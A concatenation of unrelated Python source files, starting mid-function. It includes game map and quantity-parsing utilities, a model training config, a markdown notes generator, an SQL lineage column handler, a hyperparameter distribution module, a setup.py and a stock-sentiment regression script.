return CornerEnum.LEFT
if after_row_i == before_row_i + 1 and after_col_i == before_col_i + 1:
return CornerEnum.TOP_LEFT
if after_row_i == before_row_i + 1 and after_col_i == before_col_i:
return CornerEnum.TOP
if after_row_i == before_row_i - 1 and after_col_i == before_col_i - 1:
return CornerEnum.BOTTOM_RIGHT
if after_row_i == before_row_i and after_col_i == before_col_i - 1:
return CornerEnum.RIGHT
if after_row_i == before_row_i + 1 and after_col_i == before_col_i - 1:
return CornerEnum.BOTTOM_LEFT
raise Exception("It is not possible !")
def get_corner(
width: int, height: int, new_row_i: int, new_col_i: int
) -> typing.Optional[CornerEnum]:
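    # The zone border is split into thirds; the corner column boundaries
    # shift with the row so each corner region forms a tapering wedge.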
left_col_i_end = width // 3
right_col_i_start = (width // 3) * 2
top_row_i_end = height // 3
bottom_row_i_start = (height // 3) * 2
more = new_row_i if new_row_i >= 0 else 0
if new_row_i < top_row_i_end:
right_col_i = right_col_i_start + more
left_col_i = left_col_i_end - more
elif new_row_i >= bottom_row_i_start:
more = (height // 3) - (new_row_i - bottom_row_i_start + 1)
more = more if more >= 0 else 0
right_col_i = right_col_i_start + more
left_col_i = left_col_i_end - more
else:
left_col_i = left_col_i_end
right_col_i = right_col_i_start
if new_col_i < left_col_i and new_row_i < top_row_i_end:
return CornerEnum.TOP_LEFT
if new_row_i < 0 and left_col_i <= new_col_i < right_col_i:
return CornerEnum.TOP
if new_col_i >= right_col_i and new_row_i < top_row_i_end:
return CornerEnum.TOP_RIGHT
if new_col_i > (width - 1) and top_row_i_end <= new_row_i < bottom_row_i_start:
return CornerEnum.RIGHT
if new_col_i >= right_col_i and new_row_i >= bottom_row_i_start:
return CornerEnum.BOTTOM_RIGHT
if new_row_i > (height - 1) and left_col_i_end <= new_col_i < right_col_i_start:
return CornerEnum.BOTTOM
if new_col_i < left_col_i and new_row_i >= bottom_row_i_start:
return CornerEnum.BOTTOM_LEFT
if new_col_i < 0 and top_row_i_end <= new_row_i < bottom_row_i_start:
return CornerEnum.LEFT
def filter_action_links(
links: typing.List[CharacterActionLink],
) -> typing.List[CharacterActionLink]:
new_links: typing.List[CharacterActionLink] = []
found_merge_type: typing.List[typing.Any] = []
for link in links:
if link.merge_by is None:
new_links.append(link)
else:
if link.merge_by not in found_merge_type:
new_links.append(link)
found_merge_type.append(link.merge_by)
return new_links
def display_g_or_kg(grams: float) -> str:
if grams < 1000:
return f"{grams} g"
return f"{round(grams/1000, 3)} kg"
def quantity_to_str(quantity: float, unit: Unit, kernel: "Kernel") -> str:
if unit == Unit.GRAM:
return display_g_or_kg(quantity)
unit_str = kernel.translation.get(unit)
quantity = int(quantity) if unit == Unit.UNIT else float(quantity)
return f"{str(quantity)} {unit_str}"
def is_expect_kg(quantity: float, unit: Unit) -> bool:
return unit == Unit.GRAM and quantity >= 1000
def adapt_str_quantity(
quantity: str, unit: Unit, default_unit: Unit, to_str_float: bool = False
) -> str:
if unit == Unit.GRAM:
quantity = quantity.lower()
quantity = quantity.replace(" ", "")
quantity = quantity.replace(",", ".")
if quantity.endswith("kg"):
if not to_str_float:
return f"{float(quantity[:-2]) * 1000}g"
return f"{float(quantity[:-2]) * 1000}"
if quantity.endswith("k"):
if not to_str_float:
return f"{float(quantity[:-1]) * 1000}g"
return f"{float(quantity[:-1]) * 1000}"
if quantity.endswith("g"):
if not to_str_float:
return quantity
return quantity[:-1]
if quantity.endswith("l"):
if not to_str_float:
return quantity
return quantity[:-1]
if default_unit == Unit.KILOGRAM:
if not to_str_float:
return f"{float(quantity) * 1000}g"
return f"{float(quantity) * 1000}"
return quantity
return quantity
def str_quantity_unit(quantity: str) -> typing.Optional[Unit]:
quantity = quantity.lower()
quantity = quantity.replace(" ", "")
if quantity.endswith("kg") or quantity.endswith("k"):
return Unit.KILOGRAM
if quantity.endswith("g"):
return Unit.GRAM
return None
def str_quantity_to_float(quantity: str) -> float:
quantity = quantity.lower()
quantity = quantity.replace(" ", "")
quantity = quantity.replace(",", ".")
if quantity.endswith("kg"):
return float(quantity[:-2]) * 1000
if quantity.endswith("m³"):
return float(quantity[:-2])
if quantity.endswith("g") or quantity.endswith("l") or quantity.endswith("u"):
return float(quantity[:-1])
return float(quantity)
def get_exception_for_not_enough_ap(
character: "CharacterModel", cost: float, can_be_back_url: bool = False
) -> WrongInputError:
return WrongInputError(
f"{character.name} ne possède plus assez de points d'actions "
f"({character.action_points} restant et {cost} nécessaires)"
)
# FIXME BS: replace by iterator on eatable object (to manage all case like invent friends)
def character_can_drink_in_its_zone(
kernel: "Kernel", character: "CharacterModel"
) -> bool:
# TODO: consider path finding
zone_source = kernel.tile_maps_by_position[
(character.world_row_i, character.world_col_i)
].source
return is_there_resource_id_in_zone(
kernel, kernel.game.config.fresh_water_resource_id, zone_source
)
clamp = lambda n, minn, maxn: max(min(maxn, n), minn)
def generate_background_media(media_name: str, folder_path: str) -> None:
illustration_bg_path = Path(path.join(folder_path, "media", "bg", media_name))
if not illustration_bg_path.exists():
Path(folder_path, "media", "bg").mkdir(parents=True, exist_ok=True)
# Make background illustration
server_logger.info(f"Generate background image for {media_name}")
image = Image.open(path.join(folder_path, "media", media_name))
image = image.convert("RGB")
alpha = Image.new("L", image.size, 10)
image.putalpha(alpha)
image.save(illustration_bg_path)
def generate_avatar_illustration_media(
source_image_path: str, save_to_path: str
) -> None:
avatar = Image.open(source_image_path)
    # scale so the avatar height becomes 300px, keeping the aspect ratio
    ratio = avatar.height / 300
    avatar.thumbnail((int(avatar.width / ratio), 300), Image.ANTIALIAS)
media = Image.new(mode="RGB", size=(768, 300))
media.paste(avatar, ((768 // 2) - (avatar.width // 2), 0))
media.save(save_to_path)
def generate_loading_media(source_image_path: str, save_to_path: str) -> None:
loading = Image.open(source_image_path)
    # scale so the image width becomes 768px, keeping the aspect ratio
    ratio = loading.width / 768
    loading.thumbnail((768, int(loading.height / ratio)), Image.ANTIALIAS)
enhancer = ImageEnhance.Brightness(loading)
loading = enhancer.enhance(0.33)
loading.save(save_to_path)
def generate_avatar_zone_thumb_media(source_image_path: str, save_to_path: str) -> None:
avatar = Image.open(source_image_path)
    # scale so the avatar height becomes 64px, keeping the aspect ratio
    ratio = avatar.height / 64
    avatar.thumbnail((int(avatar.width / ratio), 64), Image.ANTIALIAS)
avatar.save(save_to_path)
def ensure_avatar_medias(kernel: "Kernel", image_source: str, avatar_uuid: str) -> None:
original_avatar_file_name = ORIGINAL_AVATAR_PATTERN.format(avatar_uuid=avatar_uuid)
illustration_avatar_file_name = ILLUSTRATION_AVATAR_PATTERN.format(
avatar_uuid=avatar_uuid
)
zone_thumb_avatar_file_name = ZONE_THUMB_AVATAR_PATTERN.format(
avatar_uuid=avatar_uuid
)
source_target = (
f"{kernel.game.config.folder_path}/media/{original_avatar_file_name}"
)
if not os.path.exists(source_target):
shutil.copy(
image_source,
source_target,
)
illustration_target = (
f"{kernel.game.config.folder_path}/media/{illustration_avatar_file_name}"
)
if not os.path.exists(illustration_target):
generate_avatar_illustration_media(
image_source,
save_to_path=illustration_target,
)
zone_thumb_target = (
f"{kernel.game.config.folder_path}/media/{zone_thumb_avatar_file_name}"
)
if not os.path.exists(zone_thumb_target):
generate_avatar_zone_thumb_media(
image_source,
save_to_path=zone_thumb_target,
)
@dataclasses.dataclass
class ExpectedQuantityContext:
display_unit: Unit
display_unit_name: str
display_unit_short_name: str
real_unit: Unit
default_quantity: str
carried_quantity_str: str
@classmethod
def from_carried_resource(
cls,
kernel: "Kernel",
carried_resource: "CarriedResourceDescriptionModel",
) -> "ExpectedQuantityContext":
expect_kg: bool = is_expect_kg(carried_resource.quantity, carried_resource.unit)
display_unit = Unit.KILOGRAM if expect_kg else carried_resource.unit
unit_name = kernel.translation.get(display_unit)
unit_short_name = kernel.translation.get(display_unit, short=True)
default_quantity = (
f"{carried_resource.quantity / 1000} {unit_short_name}"
if expect_kg
else f"{carried_resource.quantity} {unit_short_name}"
)
carried_quantity_str = quantity_to_str(
carried_resource.quantity, carried_resource.unit, kernel
)
return cls(
display_unit=display_unit,
display_unit_name=unit_name,
display_unit_short_name=unit_short_name,
real_unit=carried_resource.unit,
default_quantity=default_quantity,
carried_quantity_str=carried_quantity_str,
)
@property
def display_kg(self) -> bool:
return self.display_unit == Unit.KILOGRAM
@dataclasses.dataclass
class InputQuantityContext:
user_input: str
user_unit: Unit
real_quantity: float
real_unit: Unit
@classmethod
def from_carried_resource(
cls,
user_input: str,
carried_resource: "CarriedResourceDescriptionModel",
) -> "InputQuantityContext":
expect_kg: bool = is_expect_kg(carried_resource.quantity, carried_resource.unit)
default_unit = Unit.KILOGRAM if expect_kg else carried_resource.unit
user_input = adapt_str_quantity(user_input, carried_resource.unit, default_unit)
real_quantity = str_quantity_to_float(user_input)
user_unit = str_quantity_unit(user_input) or default_unit
return cls(
user_input=user_input,
user_unit=user_unit,
real_quantity=real_quantity,
real_unit=carried_resource.unit,
)
def get_health_percent_sentence(percent: int) -> str:
if percent < 10:
return "Extrêmement abîmé"
if percent < 25:
return "Très abîmé"
if percent < 50:
return "Bien abîmé"
if percent < 75:
return "Abîmé"
if percent < 90:
return "Quelque traces d'usures"
return "Bon état"
def square_walker(
x: int, y: int
) -> typing.Generator[typing.Tuple[int, int], None, None]:
yield x, y
d = 1
def top_line():
start_x = 0 - d
fixed_y = 0 - d
return [(start_x, fixed_y)] + [
(start_x + i, fixed_y) for i in range(1, (d * 2) + 1)
]
def right_line():
fixed_x = 0 + d
start_y = 0 - d
return [(fixed_x, start_y + i) for i in range(1, (d * 2) + 1)]
def bottom_line():
start_x = 0 + d
fixed_y = 0 + d
return [(start_x - i, fixed_y) for i in range(1, (d * 2) + 1)]
def left_line():
fixed_x = 0 - d
start_y = 0 + d
return [(fixed_x, start_y - i) for i in range(1, (d * 2))]
while True:
modifiers = top_line() + right_line() + bottom_line() + left_line()
for modifier in modifiers:
yield x + modifier[0], y + modifier[1]
d += 1
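# Illustrative walk order: the start cell, then the d=1 ring clockwise from
# its top-left corner (per the line helpers above):
#   import itertools
#   list(itertools.islice(square_walker(0, 0), 9))
#   -> [(0, 0), (-1, -1), (0, -1), (1, -1), (1, 0), (1, 1), (0, 1), (-1, 1), (-1, 0)]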
|
the-stack_0_19906 | """General training parameters that define the maximum number of
training epochs, the batch size, and learning rate for the ADAM
optimization method. To reproduce the results from the paper,
these values should not be changed. The device can be either
"cpu" or "gpu", which then optimizes the model accordingly after
training or uses the correct version for inference when testing.
"""
PARAMS = {
"n_epochs": 12,
"batch_size": 8,
"learning_rate": 1e-5,
"device": "gpu"
}
"""The predefined input image sizes for each of the 3 datasets.
To reproduce the results from the paper, these values should
not be changed. They must be divisible by 8 due to the model's
downsampling operations. Furthermore, all pretrained models
for download were trained on these image dimensions.
"""
DIMS = {
"image_size_salicon": (240, 320),
"image_size_mit1003": (360, 360),
"image_size_cat2000": (216, 384)
}
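# Illustrative lookups (keys as defined above):
#   height, width = DIMS["image_size_salicon"]  # -> (240, 320)
#   batch_size = PARAMS["batch_size"]           # -> 8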
|
the-stack_0_19907 | import sys
import os
import textwrap
from datetime import datetime
import json
import pypandoc
def combine_md(f1,f2):
with open(f1,'r') as fp:
k1 = fp.read()
with open(f2,'r') as fp:
k2 = fp.read()
k2 = textwrap.indent(k2,"\t")
sol_banner = "??? Solution\n"
ks = k1+ sol_banner +k2
# print(ks)
with open("tmp.md",'w') as fp:
fp.write(ks)
def append_notes_md(f1,f2,sol_name):
with open(f1,'r') as fp:
k1 = fp.read()
with open(f2,'r') as fp:
k2 = fp.read()
k2 = textwrap.indent(k2,"\t")
# perma_link_name = "\n\n#### "+sol_name+"\n"
now = datetime.now()
date_time = now.strftime("%d %B %Y, %H:%M:%S")
sol_banner = "\n\n??? Notes\n" + "\n\t**Time**: "+date_time+"\n\n"
ks = ""
# ks += perma_link_name
ks += sol_banner +k2
# print(ks)
with open("tmp2.md",'a') as fp:
fp.write(ks)
def gen_combined_notes(basePath,targetPath,sortKey="score"):
with open("meta.json",'r') as fp:
meta = json.load(fp)
# tDir = meta[topic]['name']
if not os.path.exists(basePath):
print("problems dir does not exist")
sys.exit(2)
if not os.path.exists(targetPath):
os.system("mkdir "+targetPath)
topics = os.listdir(basePath)
for t in topics:
with open("topics/"+t.replace('_','-')+".json",'r') as fp:
dic = json.load(fp)
# with open("topics/"+tDir.replace('_','-')+".json",'r') as fp:
# dic = json.load(fp)
tDir = t
for i in range(len(dic['problems'])):
ti = dic['problems'][i]['time_to_solve']
mi,sec = ti.split(":")
tim = int(mi)*60 + int(sec)
dic['problems'][i]['time_sec']=tim
# probs = sorted(dic['problems'],key= lambda i:i['problem_score'])
if sortKey == "score":
probs = sorted(dic['problems'],key= lambda i:i['problem_score'])
elif sortKey == "time":
probs = sorted(dic['problems'],key= lambda i:(i['time_sec'],i['problem_score']))
else:
probs = sorted(dic['problems'],key= lambda i:i['problem_score'])
if not os.path.exists(targetPath):
os.system("mkdir "+targetPath)
targetTopic = meta[tDir]
if not os.path.exists(os.path.join(targetPath,targetTopic)):
os.system("mkdir -p "+targetPath+"/"+targetTopic)
problemsPath = os.path.join(basePath,tDir)
di = os.listdir(problemsPath)
for i in di:
if not os.path.isfile(os.path.join(problemsPath,i)):
dn = problemsPath+"/"+i
targetTopic=meta[tDir]
tdn = targetPath+"/"+targetTopic+"/"+i
ld = os.listdir(dn)
for j in ld:
if not os.path.exists(tdn):
os.system("mkdir "+tdn)
with open(os.path.join(dn,j),'rb') as fp:
data = fp.read()
with open(os.path.join(tdn,j),'wb') as fp2:
fp2.write(data)
combined = ""
for p in probs:
# get problem md
pFile = p['problem_link'].split("/")[-2]
if not os.path.exists(problemsPath+"/"+pFile+".json"):
continue
with open(problemsPath+"/"+pFile+".json",'r') as fp:
k = json.load(fp)
pContent = k['contentHTML']
p_md = pypandoc.convert_text(pContent,'markdown_strict',format='html')
if len(combined)!=0:
combined+= "\n---\n"
combined += p_md
sol_md=""
# check if notes or sol exists
nFile = pFile.replace("-","_")
nPath = "solutions/"+tDir+"/"+nFile+"/n_"+nFile+".md"
sPath = "solutions/"+tDir+"/"+nFile+"/s_"+nFile+".md"
if os.path.exists(nPath):
with open(nPath,'r') as fp:
k2 = fp.read()
k2 = textwrap.indent(k2,"\t")
# perma_link_name = "\n\n#### "+sol_name+"\n"
now = datetime.now()
date_time = now.strftime("%d %B %Y, %H:%M:%S")
sol_banner = '\n\n??? note "Notes"\n' + "\n\t**Time**: "+date_time+"\n\n"
ks = ""
# ks += perma_link_name
ks += sol_banner +k2
combined += ks
if os.path.exists(sPath):
print("adding sol")
with open(sPath,'r') as fp:
k2 = fp.read()
k2 = textwrap.indent(k2,"\t")
# perma_link_name = "\n\n#### "+sol_name+"\n"
now = datetime.now()
date_time = now.strftime("%d %B %Y, %H:%M:%S")
sol_banner = '\n\n??? success "Solution"\n' + "\n\t**Time**: "+date_time+"\n\n"
ks = ""
# ks += perma_link_name
ks += sol_banner +k2
combined += ks
targetTopic=meta[tDir]
with open(targetPath+"/"+targetTopic+"/"+targetTopic+".md",'w') as fp:
fp.write(combined)
def store_notes(topic,problem,sol_file):
pName = problem.replace("-","_")
with open(sol_file,'r') as fp:
data = fp.read()
with open("meta.json",'r') as fp:
meta = json.load(fp)
tDir = meta[topic]['name']
if not os.path.exists("sol/"+tDir):
os.system("mkdir -p sol/"+tDir)
ibHome="https://www.interviewbit.com/problems/"
banner = "**Problem: ["+problem+"]("+ibHome+problem+")**\n\n"
dic = {}
dic['notes'] = banner+data
dic['solution'] = ""
with open("sol/"+tDir+"/n_"+pName+".json",'w') as fp:
json.dump(dic,fp)
if __name__=="__main__":
# f1 = sys.argv[1]
# f2 = sys.argv[2]
# f3 = sys.argv[3]
# combine_md(f1,f2)
# append_sol_md(f1,f2,f3)
base=sys.argv[1]
tar=sys.argv[2]
sortKey=sys.argv[3]
# store_notes(topic,prob,sol_file)
    gen_combined_notes(base, tar, sortKey) |
the-stack_0_19909 | from sqlparse.sql import Case, Function, Identifier, IdentifierList, Operation, Token
from sqlparse.tokens import Wildcard
from sqllineage.core.handlers.base import NextTokenBaseHandler
from sqllineage.exceptions import SQLLineageException
from sqllineage.holders import SubQueryLineageHolder
from sqllineage.models import Column
class ColumnHandler(NextTokenBaseHandler):
def __init__(self):
self.columns = []
super().__init__()
def _indicate(self, token: Token) -> bool:
# OVER here is to handle window function like row_number()
return token.normalized in ("SELECT", "OVER")
def _handle(self, token: Token, holder: SubQueryLineageHolder) -> None:
column_token_types = (Identifier, Function, Operation, Case)
if isinstance(token, column_token_types) or token.ttype is Wildcard:
column_tokens = [token]
elif isinstance(token, IdentifierList):
column_tokens = [
sub_token
for sub_token in token.tokens
if isinstance(sub_token, column_token_types)
]
else:
# SELECT constant value will end up here
column_tokens = []
for token in column_tokens:
self.columns.append(Column.of(token))
def end_of_query_cleanup(self, holder: SubQueryLineageHolder) -> None:
tgt_tbl = None
if holder.write:
if len(holder.write) > 1:
raise SQLLineageException
tgt_tbl = list(holder.write)[0]
if tgt_tbl:
for tgt_col in self.columns:
tgt_col.parent = tgt_tbl
for src_col in tgt_col.to_source_columns(holder.alias_mapping):
holder.add_column_lineage(src_col, tgt_col)
|
the-stack_0_19910 | from abc import ABC, abstractmethod
from . import graph as g
from .utils import export, MsgPackEncoders
import numpy as np
import copy
import math
import msgpack
import pandas as pd
from typing import Union
def dump_tweaks(source: Union[dict, g.Graph]):
"""
Pretty-print a table of tweaks
:param source: A dict containing tweaks or a graph
:return:
"""
if isinstance(source, g.Graph):
source = source.get_tweaks_config()
if not isinstance(source, dict):
raise ValueError()
source = list(source.items())
with pd.option_context('display.max_rows', None, 'max_colwidth', 120):
print(pd.DataFrame.from_records(source, columns=('tweak_id', 'config')))
@export
class Distribution(ABC):
def __init__(self, space_descriptor, name=None):
"""
The constructor
:param space_descriptor: A dictionary containing a descriptor of the distribution's space
:param name: The name of the distribution. If not specified then the class name is used instead. This
identifier is mainly used for debug purposes.
"""
self._space_descriptor = space_descriptor
# The group property is used to assemble different sets of distributions. This is used for example
# in cgp to assign different probabilities to different groups of distributions.
self.group = None
if name is None:
name = type(self).__name__
self.name = name
@abstractmethod
def sample(self):
pass
@property
def space_descriptor(self):
"""
Return the space descriptor for the current distribution. The descriptor is a dictionary with the following
form: {'type': <type>, 'size': <size>}, where <type> can be either 'categorical' or 'continuous' and <size>
is the shape of the space.
:return: A dictionary containing the descriptor
"""
return copy.copy(self._space_descriptor)
def __repr__(self):
return str({'type': self.name, 'space': self._space_descriptor})
# TODO g.Graph.adapters[FuncTweaksDecl] = None
@export
def decl_tweaks(**key_tweak_pairs):
"""
A decorator to be used to associate tweaks to a function declaration. Also the function is 'marked' as graph's node
:param key_tweak_pairs:
:return:
"""
def real_decorator(function):
if isinstance(function, g.FuncTweaksDecl):
wrapper = function
else:
wrapper = g.FuncTweaksDecl(function=function, prefix=function.__name__)
wrapper.tweaks_config.update(key_tweak_pairs)
return wrapper
return real_decorator
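# Illustrative use of decl_tweaks (hypothetical node function and tweak names):
#   @decl_tweaks(units=QUniform(low=8, high=64), act=UniformChoice(('relu', 'tanh')))
#   def dense_layer(input, units, act):
#       ...
# The decorated function is wrapped in a FuncTweaksDecl whose tweaks_config
# maps 'units' and 'act' to the distributions given above.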
class Aggregation(Distribution):
def __init__(self, base: Distribution, size):
"""
An aggregation of independent random variables of the same type
:param base: The base distribution to be used for each variable
:param size: The shape of the space containing the random variables following the distribution
of the parameter base
"""
if isinstance(base, Aggregation):
raise ValueError('The base distribution of an Aggregation cannot be an Aggregation itself')
self.base = base
self.size = size
super().__init__(space_descriptor={'type': base.space_descriptor['type'], 'size': size})
def sample(self):
count = np.product(self.size)
base = self.base
output = [base.sample() for _ in range(count)]
return np.reshape(output, self.size)
def mutation(self, current_value, prob):
"""
A specific helper for genetic algorithms. A subset of the aggregated variables is selected with
probability prob and mutation is applied by resampling the generated values from the base distribution.
:param current_value:
:param prob: A float or list of floats representing the probability of mutation. When prob is a list, then
it represents individual probabilities of mutation for each gene.
:return:
"""
selection = np.where(np.random.uniform(size=self.size) < prob)
current_value[selection] = self.base.sample_multiple(size=(len(selection[0]), ))
return current_value
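# Illustrative sketch: aggregate five i.i.d. uniform genes, sample a genome,
# then resample roughly 20% of its genes via mutation.
#   agg = Aggregation(Uniform(low=0.0, high=1.0), size=(5,))
#   genome = agg.sample()
#   genome = agg.mutation(genome, prob=0.2)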
@export
class Constant(Distribution):
def __init__(self, value):
"""
A Dummy distribution that returns a constant value
:param value: The constant value returned by the distribution
"""
self.value = value
super().__init__(space_descriptor={'type': 'categorical', 'size': 1})
def sample(self):
return self.value
@export
class UniformChoice(Distribution):
def __init__(self, values=(), group=None):
values = list(values)
self.values = values
self.gen = lambda: np.random.choice(values)
super().__init__(space_descriptor={'type': 'categorical', 'size': len(values)})
self.group = group
def sample(self):
return self.gen()
def sample_multiple(self, size):
return np.random.choice(self.values, size=size)
@export
class UniformPermutation(Distribution):
def __init__(self, values, k=None):
"""
Random permutation of elements from parameter values into groups of size k.
:param values:
:param k: The number of elements of a permutation. If k is None the k is assumed len(values).
"""
values = list(values)
n = len(values)
if k is None:
k = n
if not isinstance(k, int):
raise ValueError()
if k > n:
raise ValueError()
self.k = k
self.values = values
size = math.factorial(n) // math.factorial(n-k)
super().__init__(space_descriptor={'type': 'categorical', 'size': size})
def sample(self):
values = self.values
if self.k == len(values):
return list(np.random.permutation(values))
idxs = np.random.permutation(len(values))[:self.k]
return [values[idx] for idx in idxs]
def _qround(n, q):
return int(np.round(n/q)*q)
@export
class QUniform(Distribution):
def __init__(self, low=0, high=16, q=1.0, size=None, group=None):
if not isinstance(low, int) or not isinstance(high, int):
raise ValueError()
self.range = (low, high)
self.q = q
self.size = size
if q == 1.0:
self.gen = lambda: int(np.random.randint(low=low, high=high+1, size=size))
else:
self.gen = lambda: int(np.round(np.random.uniform(low=low, high=high, size=size) / q) * q)
super().__init__(space_descriptor={'type': 'discrete', 'boundaries': (_qround(low, q=q), _qround(high, q=q))})
self.group = group
def sample(self):
return self.gen()
@export
class QNormal(Distribution):
def __init__(self, mean=0, stddev=1.0, q=1.0, size=None):
self.gen = lambda: int(np.round(np.random.normal(loc=mean, scale=stddev, size=size) / q) * q)
super().__init__(space_descriptor={'type': 'discrete', 'boundaries': (-np.inf, np.inf)})
def sample(self):
return self.gen()
@export
class Uniform(Distribution):
def __init__(self, low=.0, high=1.0, size=None):
self.range = (low, high)
self.size = size
self.gen = lambda: np.random.uniform(low=low, high=high, size=size)
super().__init__(space_descriptor={'type': 'continuous', 'boundaries': (low, high)})
def sample(self):
return self.gen()
def sample_multiple(self, size):
r = self.range
return np.random.uniform(low=r[0], high=r[1], size=size)
def clip(self, v):
r = self.range
return np.clip(v, a_min=r[0], a_max=r[1])
@export
class Normal(Distribution):
def __init__(self, mean=0, stddev=1.0, size=None):
self.mean = mean
self.stddev = stddev
self.gen = lambda: np.random.normal(loc=mean, scale=stddev, size=size)
super().__init__(space_descriptor={'type': 'continuous', 'boundaries': (-np.inf, np.inf)})
def sample(self):
return self.gen()
@staticmethod
def clip(v):
return v
@export
class Poisson(Distribution):
def __init__(self, lam=1.0, size=None):
self.gen = lambda: np.random.poisson(lam=lam, size=size)
super().__init__(space_descriptor={'type': 'continuous', 'boundaries': (0, np.inf)})
def sample(self):
return self.gen()
@export
class LogUniform(Distribution):
def __init__(self, low=np.finfo(float).tiny, high=1.0, size=None):
# TODO validate params
self.gen = lambda: np.exp(np.random.uniform(low=np.log(low), high=np.log(high), size=size))
super().__init__(space_descriptor={'type': 'continuous', 'boundaries': (low, high)})
def sample(self):
return self.gen()
@export
class LogNormal(Distribution):
def __init__(self, mean=0, stddev=1.0, size=None):
self.gen = lambda: np.exp(np.random.normal(loc=mean, scale=stddev, size=size))
super().__init__(space_descriptor={'type': 'continuous', 'boundaries': (-np.inf, np.inf)})
def sample(self):
return self.gen()
@export
class QLogUniform(Distribution):
def __init__(self, low=1, high=100, q=1.0, size=None):
self.gen = lambda: int(np.round(np.exp(np.random.uniform(low=np.log(low), high=np.log(high), size=size))/q)*q)
super().__init__(space_descriptor={'type': 'discrete', 'boundaries': (_qround(low, q=q), _qround(high, q=q))})
def sample(self):
return self.gen()
class Sample(g.Node):
def __init__(self, distribution: Distribution, default=None, name=None):
if not isinstance(distribution, Distribution):
raise ValueError()
self.distribution = distribution
self.default = default
super().__init__(name)
def get_hpopt_config_ranges(self):
return {self.fully_qualified_name: self.distribution}
def __call__(self, input, hpopt_config={}):
return hpopt_config.get(self.fully_qualified_name, self.default)
class Switch(g.Node):
"""
A node that acts as a switch. One of the inputs is selected and returned. The selection is driven by a tweak that is
published by this node. During runtime (in the graph context) only the active path is executed, the nodes on the
dead paths are ignored that is they are not executed.
"""
def __init__(self, default=None, name=None, distribution_group=None):
# TODO allow different probabilities for different inputs
self.default = default
self.distribution_group = distribution_group
super().__init__(name)
def get_hpopt_config_ranges(self):
g = self.parent
assert g is not None
input_binding = g.get_node_input_binding(self)
if input_binding is None:
return {}
if isinstance(input_binding, dict):
return {self.fully_qualified_name: UniformChoice(input_binding.keys(), group=self.distribution_group)}
return {self.fully_qualified_name: QUniform(high=len(input_binding)-1, group=self.distribution_group)}
def get_input_binding(self, hpopt_config={}):
choice = hpopt_config.get(self.fully_qualified_name, self.default)
if choice is None:
return None
g = self.parent
assert g is not None
input_binding = g.get_node_input_binding(self)
assert input_binding is not None
return input_binding[choice]
def __call__(self, input, hpopt_config={}):
# the selection is performed in the get_input_binding so here we simply return the input
return input
class Permutation(g.Node):
def __init__(self, size=None, name=None):
if size is not None and size <= 0:
raise ValueError()
self.size = size
super().__init__(name)
def get_hpopt_config_ranges(self):
g = self.parent
assert g is not None
input_binding = g.get_node_input_binding(self)
if input_binding is None:
return {}
if isinstance(input_binding, dict):
return {self.fully_qualified_name: UniformPermutation(k=self.size, values=input_binding.keys())}
return {self.fully_qualified_name: UniformPermutation(k=self.size, values=range(len(input_binding)))}
def get_input_binding(self, hpopt_config={}):
selection = hpopt_config.get(self.fully_qualified_name)
if selection is None:
return None
g = self.parent
assert g is not None
input_binding = g.get_node_input_binding(self)
assert input_binding is not None
return [input_binding[key] for key in selection]
def __call__(self, input, hpopt_config={}):
# the selection is performed in the get_input_binding so here we simply return the input
return input
@export
def switch(*, default=None, name=None, distribution_group=None) -> g.Node:
return Switch(name=name, default=default, distribution_group=distribution_group)
# TODO switch_call
@export
def permutation(*, size=None, name=None) -> g.Node:
return Permutation(size=size, name=name)
@export
def tweak(value, *, default=None, name=None) -> g.Node:
# TODO declare "level", that is, when the tweak is applied (eg. runtime)
if isinstance(value, Distribution):
return Sample(distribution=value, name=name, default=default)
raise ValueError("Input type not supported")
class TweaksSerializer:
@staticmethod
def save(obj, stream):
if not isinstance(obj, dict):
raise ValueError()
output = {}
for key, value in obj.items():
if hasattr(value, '_hg_tweak_descriptor'):
value = getattr(value, '_hg_tweak_descriptor')
output[key] = value
msgpack.pack(output, stream, use_bin_type=True, default=MsgPackEncoders.encode)
@staticmethod
def load(stream, graph=None):
tweaks = msgpack.unpack(stream, object_hook=MsgPackEncoders.decode, raw=False)
if graph is not None:
graph.resolve_tweaks(tweaks)
return tweaks
|
the-stack_0_19911 | from sys import version
from setuptools import find_packages, setup
if version[0] == "2":
from itertools import imap as map, ifilter as filter
from ast import parse
from distutils.sysconfig import get_python_lib
from functools import partial
from os import listdir, path
if __name__ == "__main__":
package_name = "offregister_python"
with open(path.join(package_name, "__init__.py")) as f:
__author__, __version__ = map(
lambda buf: next(map(lambda e: e.value.s, parse(buf).body)),
filter(
lambda line: line.startswith("__version__")
or line.startswith("__author__"),
f,
),
)
to_funcs = lambda *paths: (
partial(path.join, path.dirname(__file__), package_name, *paths),
partial(path.join, get_python_lib(prefix=""), package_name, *paths),
)
_data_join, _data_install_dir = to_funcs("_data")
_config_join, _config_install_dir = to_funcs("_config")
setup(
name=package_name,
author=__author__,
version=__version__,
description="Python deployment module for Fabric (offregister)",
classifiers=[
"Development Status :: 7 - Inactive",
"Intended Audience :: Developers",
"Topic :: Software Development",
"Topic :: Software Development :: Libraries :: Python Modules",
"License :: OSI Approved :: MIT License",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python",
"Programming Language :: Python :: 2.7",
],
install_requires=["pyyaml", "fab-classic", "paramiko"],
test_suite=package_name + ".tests",
packages=find_packages(),
package_dir={package_name: package_name},
data_files=[
(_data_install_dir(), list(map(_data_join, listdir(_data_join())))),
(_config_install_dir(), list(map(_config_join, listdir(_config_join())))),
],
)
|
the-stack_0_19913 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
from sklearn.neighbors import KNeighborsRegressor
from sklearn.linear_model import LinearRegression, Ridge, Lasso
from sklearn.tree import DecisionTreeRegressor
from sklearn.model_selection import train_test_split
from sklearn.metrics import r2_score
__author__ = "Fengming Liu"
__status__ = "Development"
def regressor_run(reg, name, x_train, x_test, y_train, y_test):
reg.fit(x_train,y_train)
y_pred = reg.predict(x_test)
print(name)
print("R2:", r2_score(y_test, y_pred))
# print("RMSE:", mean_squared_error(y_test, y_pred))
plt.plot(y_test, label='true')
plt.plot(y_pred, label='pred')
plt.legend()
plt.title(name)
plt.show()
return r2_score(y_test, y_pred)
company_list = ["apple", "amazon", "facebook", "google", "microsoft", "netflix", "tesla"]
features_list = [["relative_day"],
["past_3_days_senti_avg"],
["past_7_days_senti_avg"],
["1_day_sentiment_score"],
["1_day_news_count"],
["1_day_overall_sentiment_score"],
["relative_day", "past_3_days_senti_avg"],
["relative_day", "past_7_days_senti_avg"]
]
response_list = ["high", "low", "open", "close", "volume"]
result = open("./basic_models_results.csv", "a")
